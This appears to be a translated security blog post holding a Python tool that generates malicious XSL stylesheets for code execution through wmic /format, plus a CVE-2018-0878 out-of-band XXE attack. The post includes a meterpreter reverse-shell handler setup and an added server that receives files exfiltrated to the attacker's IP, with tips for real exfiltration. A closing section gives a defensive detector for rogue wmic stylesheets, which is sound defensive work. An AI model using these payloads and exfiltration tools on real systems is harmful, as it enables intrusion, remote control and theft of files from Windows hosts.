0x00 Preface
Today I loaded the RSS feed that Demon shared. One of the entries was a post by 三好学生:
After reading that article carefully I understood some of the tricks in it, which led to the script below.
0x001 Code
import optparse
import os
import socket


def main():
    parser = optparse.OptionParser()
    parser.add_option('-b', dest='local', action='store_true',
                      help='Generate a local XSL (poc.xsl)')
    parser.add_option('-y', dest='Long', action='store_true',
                      help='Generate a remote XSL (Longpoc.xsl) to be served over HTTP')
    parser.add_option('-j', dest='CVE', action='store_true',
                      help='Conduct CVE-2018-0878 (XXE through wmic /format)')
    (options, args) = parser.parse_args()
    if options.local:
        Local()
    elif options.Long:
        Long()
    elif options.CVE:
        Cve()
    else:
        parser.print_help()
        exit()


def Local():
    # Microsoft's stock csv.xsl with an msxsl:script block added; the JScript
    # runs as soon as the root template evaluates user:myFunction().
    with open('poc.xsl', 'w') as l:
        l.write(r'''<?xml version="1.0"?>
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:my-scripts">
<xsl:output encoding="utf-16" omit-xml-declaration="yes"/>
<xsl:param name="norefcomma"/>
<msxsl:script language="JScript" implements-prefix="user">
function myFunction() {
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    return "";
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:myFunction()"/>
Node,<xsl:for-each select="COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.ARRAY|COMMAND/RESULTS[1]/CIM/INSTANCE[1]//PROPERTY.REFERENCE"><xsl:value-of select="@NAME"/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each><xsl:apply-templates select="COMMAND/RESULTS"/></xsl:template>
<xsl:template match="RESULTS" xml:space="preserve"><xsl:apply-templates select="CIM/INSTANCE"/></xsl:template>
<xsl:template match="VALUE.ARRAY" xml:space="preserve">{<xsl:for-each select="VALUE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">;</xsl:if></xsl:for-each>}</xsl:template>
<xsl:template match="VALUE" xml:space="preserve"><xsl:value-of select="."/></xsl:template>
<xsl:template match="INSTANCE" xml:space="preserve">
<xsl:value-of select="../../@NODE"/>,<xsl:for-each select="PROPERTY|PROPERTY.ARRAY|PROPERTY.REFERENCE"><xsl:apply-templates select="."/><xsl:if test="position()!=last()">,</xsl:if></xsl:for-each></xsl:template>
<xsl:template match="PROPERTY.REFERENCE" xml:space="preserve"><xsl:apply-templates select="VALUE.REFERENCE"></xsl:apply-templates></xsl:template>
<xsl:template match="PROPERTY"><xsl:apply-templates select="VALUE"/></xsl:template>
<xsl:template match="PROPERTY.ARRAY"><xsl:for-each select="VALUE.ARRAY"><xsl:apply-templates select="."/></xsl:for-each></xsl:template>
<xsl:template match="VALUE.REFERENCE">"<xsl:apply-templates select="INSTANCEPATH/NAMESPACEPATH"/><xsl:apply-templates select="INSTANCEPATH/INSTANCENAME|INSTANCENAME"/>"</xsl:template>
<xsl:template match="NAMESPACEPATH">\<xsl:value-of select="HOST/text()"/><xsl:for-each select="LOCALNAMESPACEPATH/NAMESPACE"><xsl:value-of select="@NAME"/></xsl:for-each>:</xsl:template>
<xsl:template match="INSTANCENAME"><xsl:value-of select="@CLASSNAME"/><xsl:for-each select="KEYBINDING"><xsl:if test="position()=1">.</xsl:if><xsl:value-of select="@NAME"/>="<xsl:value-of select="KEYVALUE/text()"/>"<xsl:if test="position()!=last()"></xsl:if><xsl:if test="not($norefcomma="true")">,</xsl:if><xsl:if test="$norefcomma="true""><xsl:text> </xsl:text></xsl:if></xsl:for-each></xsl:template>
</xsl:stylesheet>
''')
    print('[*]Generation complete')
    print('[*]If you want a meterpreter, generate the backdoor, put it on the target machine, and use modify.py to change the program that the XSL executes')
    print('[*]On the target, enter the directory containing poc.xsl and run: wmic os get /format:poc.xsl')


def Long():
    # Minimal stylesheet: the JScript runs when wmic loads it, no template needed.
    with open('Longpoc.xsl', 'w') as g:
        g.write('''<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</ms:script>
</stylesheet>
''')
    print('[*]Generation complete')
    os.system('mv Longpoc.xsl /var/www/html')
    print('[*]The XSL has been moved to /var/www/html')
    print('[*]Use modify.py to change the program that the XSL executes')
    print('[*]Put the generated backdoor on the target machine')
    print('[*]Start the Apache service')
    print('[*]On the target run: wmic os get /format:"http://IP/Longpoc.xsl"')


def Cve():
    print('[@]Vulnerability introduction: https://www.exploit-db.com/exploits/44352/')
    # Connecting a UDP socket sends nothing, but makes the kernel pick the
    # outbound interface, so getsockname() yields the attacker's LAN IP.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(('8.8.8.8', 80))
    ip = s.getsockname()[0]
    s.close()
    # Serves xxe.xml from the current directory and also shows the
    # out-of-band callback carrying the file contents in its request line.
    ml = 'python -m SimpleHTTPServer 8080'
    with open('xxe.xml', 'w') as c:
        c.write('''<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://{}:8080/?%payload;'> ">
'''.format(ip))
    with open('payload.xsl', 'w') as p:
        p.write('''<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://{}:8080/xxe.xml">
%remote;%root;%oob;]>
'''.format(ip))
    print('[*]Local IP: {}'.format(ip))
    print('[*]xxe.xml has been written to the current directory')
    print('[*]payload.xsl has been written; copy it to the target and run: wmic os get /format:payload.xsl')
    print('[*]Starting an HTTP server on port 8080 to serve xxe.xml and receive the callback')
    os.system(ml)


if __name__ == '__main__':
    main()
Test result: -b
Attacker: Ubuntu
Victim: Windows Server 2008 R2
The XSL after generation and modification:
shell.exe generated by msfvenom:
On Windows Server 2008 R2, enter the directory containing shell.exe and run in cmd (wmic resolves the bare name to sd.xsl in the current directory, here the modified stylesheet):
wmic os get /format:sd
Start the listener on Ubuntu:
use exploit/multi/handler
set LHOST 192.168.223.133
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run
Test result: -j CVE-2018-0878
Vulnerability details: https://www.exploit-db.com/exploits/44352/
xxe.xml and payload.xsl were generated
xxe.xml was moved to /var/www/html
payload.xsl was placed on the victim, Windows Server 2008 R2
xxe.xml:
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.223.133:8080/?%payload;'> ">
payload.xsl:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.223.133:8080/xxe.xml">
%remote;%root;%oob;]>
Start the Apache service:
service apache2 start
Run on Windows Server 2008 R2:
wmic os get /format:payload.xsl
The command failed, but the vulnerability was triggered successfully.
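The exchange above has two HTTP requests from the target: first the fetch of xxe.xml, then the callback whose query string is the file contents. The script above relies on SimpleHTTPServer's console log to see both. The following is an added example, not code from the original post, of a small receiver that serves the DTD itself and decodes whatever comes back; it assumes the 192.168.223.133:8080 listener and the xxe.xml/payload.xsl names from the test run. One practical caveat, not established by the post: a target file with line breaks, such as win.ini, produces an entity value with newlines inside the URL, which the XML parser will typically reject before any request is made, so a single-line file is the better choice when the goal is exfiltration rather than just a hit.

```python
"""Receiver for the CVE-2018-0878 out-of-band XXE exchange.

Added example (not the original post's script). Assumes the attacker host
192.168.223.133 on port 8080 and the xxe.xml / payload.xsl names used in
the test run above.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

LISTEN_PORT = 8080

# The same external DTD the script writes to xxe.xml, kept in memory so the
# receiver can hand it out without touching the filesystem. win.ini is used
# here because the post used it; swap in a single-line file for real
# exfiltration (see the caveat in the text).
XXE_DTD = (
    '<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">\n'
    '<!ENTITY % root "<!ENTITY % oob SYSTEM '
    "'http://192.168.223.133:8080/?%payload;'> \">\n"
)


def classify_request(path):
    """Map a request path to one of:

    ('dtd',   body) - the target is fetching xxe.xml (step 1 of the exchange)
    ('exfil', data) - the callback; data is the decoded query string
    ('other', None) - anything else (favicon, scanners, typos)
    """
    parts = urlsplit(path)
    if parts.path == '/xxe.xml':
        return ('dtd', XXE_DTD)
    if parts.path == '/' and parts.query:
        # The parser may or may not percent-encode; unquote handles both.
        return ('exfil', unquote(parts.query))
    return ('other', None)


class OOBHandler(BaseHTTPRequestHandler):
    received = []  # decoded callbacks, newest last

    def do_GET(self):
        kind, data = classify_request(self.path)
        if kind == 'dtd':
            body = XXE_DTD.encode()
            self.send_response(200)
            self.send_header('Content-Type', 'application/xml-dtd')
            self.send_header('Content-Length', str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            self.log_message('DTD served to %s', self.client_address[0])
            return
        if kind == 'exfil':
            OOBHandler.received.append(data)
            self.log_message('exfiltrated from %s: %r',
                             self.client_address[0], data)
        # Nothing to return to the parser; 204 keeps it quiet.
        self.send_response(204)
        self.end_headers()


def serve(port=LISTEN_PORT):
    """Block forever, logging each DTD fetch and decoded callback."""
    HTTPServer(('0.0.0.0', port), OOBHandler).serve_forever()


if __name__ == '__main__':
    serve()
```

Run it in place of `python -m SimpleHTTPServer 8080`, then trigger `wmic os get /format:payload.xsl` on the target; a "DTD served" line with no following "exfiltrated" line is the signature of the invalid-URL case described above.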
I won't demonstrate the -y (remote) option here; its steps are much the same as the two above:
1. Edit the generated XSL so it runs the program you want on the target, then move it into the apache2 web root
2. Start apache2
3. Drop the generated backdoor onto the target
4. Run: wmic os get /format:"http://192.168.223.133/poc.xsl"
At that point wmic requests the XSL over HTTP and executes it; if your listener is up, you receive a shell.
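Both procedures on this page leave the same trace on the endpoint: a wmic process whose /format argument is not one of the stock stylesheets, either a bare name or path that wmic resolves to a file on disk (the -b run with /format:sd, and the -j run with /format:payload.xsl) or a URL it downloads (the -y run above). The following is an added example, not part of the original post, of a classifier for process-creation command lines that separates those from ordinary wmic use. The set of stock stylesheet names is an assumption taken from the files that ship in %SystemRoot%\System32\wbem, and the sample command lines are constructed.

```python
"""Flag wmic invocations that load a non-stock XSL stylesheet.

Added example, not code from the original post. STOCK_FORMATS is an assumed
list of the stylesheets shipped in %SystemRoot%\\System32\\wbem.
"""
import re

STOCK_FORMATS = {
    "csv", "hform", "htable", "htable-sortby", "list", "mof", "rawxml",
    "table", "texttable", "textvaluelist", "value", "xml",
}

# Matches /format:value, /format:"quoted value" and the -format= spellings.
FORMAT_RE = re.compile(r'[/-]format\s*[:=]\s*(?:"([^"]*)"|(\S+))',
                       re.IGNORECASE)


def format_argument(cmdline):
    """Value of the /format switch in a command line, or None if absent."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify_wmic(cmdline):
    """Classify one process command line.

    Returns 'not-wmic', 'no-format', 'stock', 'local-xsl' or 'remote-xsl'.
    Only a direct wmic launch is inspected; wmic started through another
    interpreter (powershell -c "wmic ...") shows up on that child's own row.
    """
    stripped = cmdline.strip()
    if not stripped:
        return 'not-wmic'
    head = stripped.split(None, 1)[0].strip('"').lower()
    if re.split(r'[\\/]', head)[-1] not in ('wmic', 'wmic.exe'):
        return 'not-wmic'
    value = format_argument(stripped)
    if value is None:
        return 'no-format'
    value = value.strip().strip('"')
    # URL or UNC path: wmic downloads the stylesheet (the -y case).
    if re.match(r'^[a-z][a-z0-9+.-]*://', value, re.IGNORECASE) \
            or value.startswith('\\\\'):
        return 'remote-xsl'
    # Any explicit path is attacker-chosen, whatever the file is named.
    if re.search(r'[\\/]', value):
        return 'local-xsl'
    # Bare name: wmic appends .xsl; anything not stock is a planted file
    # (the -b case, /format:sd -> sd.xsl in the working directory).
    name = value.lower()
    if name.endswith('.xsl'):
        name = name[:-4]
    return 'stock' if name in STOCK_FORMATS else 'local-xsl'


def scan(cmdlines):
    """Return (cmdline, verdict) for every line that loads a non-stock XSL."""
    hits = []
    for line in cmdlines:
        verdict = classify_wmic(line)
        if verdict in ('local-xsl', 'remote-xsl'):
            hits.append((line, verdict))
    return hits


# Constructed sample of process-creation command lines (Sysmon event 1 or
# Security 4688 style): the three commands used on this page plus benign use.
SAMPLE_CMDLINES = [
    r'wmic os get /format:sd',
    r'wmic os get /format:"http://192.168.223.133/poc.xsl"',
    r'wmic os get /format:payload.xsl',
    r'wmic os get /format:csv',
    r'C:\Windows\System32\wbem\WMIC.exe computersystem get /format:list',
    r'wmic process list full',
    r'powershell -c "wmic os get /format:evil"',
]

if __name__ == '__main__':
    for line, verdict in scan(SAMPLE_CMDLINES):
        print('[%s] %s' % (verdict, line))
```

The stock names are treated as benign only when given bare; a stock name with a directory in front of it, such as /format:C:\tmp\csv.xsl, is still reported, because the file is no longer the one under wbem.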